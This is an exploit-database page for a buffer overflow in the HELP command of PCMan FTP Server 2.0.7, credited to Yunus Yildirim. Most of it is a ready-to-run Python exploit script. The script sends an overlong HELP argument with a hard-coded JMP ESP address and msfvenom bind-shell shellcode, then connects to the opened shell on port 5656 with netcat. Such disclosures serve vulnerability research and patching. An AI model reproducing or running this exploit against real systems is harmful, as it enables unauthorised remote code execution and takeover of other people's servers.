PCMan FTP Server 2.0.7 HELP Buffer Overflow

Published
Credit
Risk
2016.11.13
Yunus YILDIRIM
High
CWE
CVE
Local
Remote
CWE-119
N/A
No
No

#!/usr/bin/env python
#-*- coding: utf-8 -*-

# Exploit Title: PCMan FTP Server 2.0.7 - 'HELP' Command Buffer Overflow
# Date: 07/11/2016
# Author: Yunus YILDIRIM (Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Tested on: Windows 7 Ultimate 32Bit

import socket
import sys
import os
import time

def banner():
banner = "\n\n"
banner +=" aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaa \n"
banner +=" aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \n"
banner +=" aaa aaaaaaaaa aaaaa aaaaaa aaaaaaaaaaaaaaaaa \n"
banner +=" aaa aaaaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaa \n"
banner +=" aaaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa \n"
banner +=" aaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaa \n"
banner +=" \n"
print banner

def exploit(target, port):

eip = "\xC3\x9C\xB4\x76" #SHELL32.dll 76B49CC3 JMP ESP

# msfvenom -p windows/shell_bind_tcp LPORT=5656 -b '\x00\x0a\x0d\xff' -f c
shellcode = ("\xdb\xcf\xd9\x74\x24\xf4\xba\x9f\xef\x1b\x27\x5e\x29\xc9\xb1"
"\x53\x31\x56\x17\x03\x56\x17\x83\x59\xeb\xf9\xd2\x99\x1c\x7f"
"\x1c\x61\xdd\xe0\x94\x84\xec\x20\xc2\xcd\x5f\x91\x80\x83\x53"
"\x5a\xc4\x37\xe7\x2e\xc1\x38\x40\x84\x37\x77\x51\xb5\x04\x16"
"\xd1\xc4\x58\xf8\xe8\x06\xad\xf9\x2d\x7a\x5c\xab\xe6\xf0\xf3"
"\x5b\x82\x4d\xc8\xd0\xd8\x40\x48\x05\xa8\x63\x79\x98\xa2\x3d"
"\x59\x1b\x66\x36\xd0\x03\x6b\x73\xaa\xb8\x5f\x0f\x2d\x68\xae"
"\xf0\x82\x55\x1e\x03\xda\x92\x99\xfc\xa9\xea\xd9\x81\xa9\x29"
"\xa3\x5d\x3f\xa9\x03\x15\xe7\x15\xb5\xfa\x7e\xde\xb9\xb7\xf5"
"\xb8\xdd\x46\xd9\xb3\xda\xc3\xdc\x13\x6b\x97\xfa\xb7\x37\x43"
"\x62\xee\x9d\x22\x9b\xf0\x7d\x9a\x39\x7b\x93\xcf\x33\x26\xfc"
"\x3c\x7e\xd8\xfc\x2a\x09\xab\xce\xf5\xa1\x23\x63\x7d\x6c\xb4"
"\x84\x54\xc8\x2a\x7b\x57\x29\x63\xb8\x03\x79\x1b\x69\x2c\x12"
"\xdb\x96\xf9\x8f\xd3\x31\x52\xb2\x1e\x81\x02\x72\xb0\x6a\x49"
"\x7d\xef\x8b\x72\x57\x98\x24\x8f\x58\xb0\xac\x06\xbe\xd6\xdc"
"\x4e\x68\x4e\x1f\xb5\xa1\xe9\x60\x9f\x99\x9d\x29\xc9\x1e\xa2"
"\xa9\xdf\x08\x34\x22\x0c\x8d\x25\x35\x19\xa5\x32\xa2\xd7\x24"
"\x71\x52\xe7\x6c\xe1\xf7\x7a\xeb\xf1\x7e\x67\xa4\xa6\xd7\x59"
"\xbd\x22\xca\xc0\x17\x50\x17\x94\x50\xd0\xcc\x65\x5e\xd9\x81"
"\xd2\x44\xc9\x5f\xda\xc0\xbd\x0f\x8d\x9e\x6b\xf6\x67\x51\xc5"
"\xa0\xd4\x3b\x81\x35\x17\xfc\xd7\x39\x72\x8a\x37\x8b\x2b\xcb"
"\x48\x24\xbc\xdb\x31\x58\x5c\x23\xe8\xd8\x6c\x6e\xb0\x49\xe5"
"\x37\x21\xc8\x68\xc8\x9c\x0f\x95\x4b\x14\xf0\x62\x53\x5d\xf5"
"\x2f\xd3\x8e\x87\x20\xb6\xb0\x34\x40\x93")

buffer = 'A'*2006 + eip + "\x90"*21 + shellcode

try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,port))
s.recv(1024)
print "[+] Connect to %s on port %d" % (target,port)
except Exception, e:
print "[-] Could not create socket", e.message
sys.exit(0)

try:
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS CT-Zer0\r\n')
s.recv(1024)
s.send('HELP ' + buffer + '\r\n')
print "[+] Exploit Sent Successfully"
s.close()
print '[+] You got bind shell on port 5656\n'
time.sleep(2)
os.system('nc ' + target + ' 5656')
except:
print "[-] Could not connect to target"


if len(sys.argv) == 3:
banner()
target = sys.argv[1]
port = int(sys.argv[2])
exploit(target, port)
else:
banner()
print "[*] Usage: python %s <IP> <Port>\n" % sys.argv[0]
sys.exit(0)


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com